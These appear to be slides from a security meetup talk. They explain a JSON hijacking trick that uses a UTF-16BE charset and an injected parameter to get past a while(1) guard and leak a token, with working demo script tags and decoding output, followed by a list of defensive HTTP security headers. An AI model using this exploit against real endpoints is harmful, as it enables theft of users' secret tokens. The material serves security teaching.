One Trick
and
One Treat

Renato Rodrigues  -  @SiMpS0N  -  //pathonproject.com
ØxOPOSɆC Mɇɇtuᵽ [0x6F] - The Meet

Trick

Reference

𝐔ni͓̽co̷d乇

Specify a charset 

<script src="//JSON-ENDPOINT" charset="utf-16be"></script>

 

Content-Type: application/json; charset=utf-8

The weird case of JSON Hijack 

while(1);[{token:"secret1",uid:"INJECTION"}]

Remember: UTF-8 ( 1 byte) | UTF-16 ( 2 bytes) | UTF-32 ( 4 bytes)

Goals: 
  - Use a non-ASCII encoding in order to avoid the infinite loop;
  - Have valid Javascript.

Reference

𝐔ni͓̽co̷d乇

The weird case of JSON Hijack 

while(1) ... -> To Unicode
>`\u{77}\u{68}\u{69}\u{6c}\u{65}\u{28}\u{31}\u{29}`
  while(1)

UTF-16BE Encode
>`\u{7768}\u{696c}\u{6528}\u{3129}`
  "睨楬攨ㄩ" ...

Since the JSON endpoint had an injection
By injecting "unicode_identifier=1//"

We can access the "window" object, and get the last prop set:

 

JSON content will be inside its bytes!

睨楬攨ㄩ .. %00=%001%00/%00/
Object.keys(self).pop()

DEMO

<script charset="utf-16be" src="http://demo.vwzq.net/php/secret.php?uid=%00=%001%00%2f%00%2f"></script> 
<script>alert(unescape(escape((Object.keys(window).pop())).replace(/%u(..)(..)/g,'%$1%$2')).substr(18,7))</script>

<pre>
> Object.keys(window).pop()
"睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢"

> escape("睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢")
"%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22"

> "%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22".replace(/%u(..)(..)/g,'%$1%$2')
"%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22"

> unescape("%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22")
"while(1);[{token:"secret1",uid:""
	
> 'while(1);[{token:"secret1",uid:"'.substr(18,7)
"secret1"
</pre>

TREAT

Classic Sec. Headers

X-Xss-Protection

X-Frame-Options

X-Content-Type-Options

Strict-Transport-Security

Public-Key-Pins

Content-Security-PolicY

"New"Sec. Headers

Referrer-Policy

HTTP header governs which referrer information, sent in the Referrer header, should be included with requests made.

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Reference

Feature-Policy

Feature Policy will allow a site to enable or disable certain browser features and APIs in the interest of better security and privacy. 

Feature-Policy:
 accelerometer 'none';
 camera 'none'; 
 geolocation 'none'; 
 gyroscope 'none';
 microphone 'none';
 payment 'none';
 usb 'none'
 push 'self'
 ...

Reference

"New"Sec. Headers

Suborigins

Clear Site Data

Mechanism for programmatically defining origins to isolate different applications running in the same physical origin.

Clears browsing data (cookies, storage, cache) associated with the requesting website.

"New"Sec. Headers

The End!

One Trick and one Treat

By Renato Rodrigues

Private

One Trick and one Treat

One Trick and one Treat - ØxOPOSɆC Mɇɇtuᵽ [0x6F] - The Meet

More from Renato Rodrigues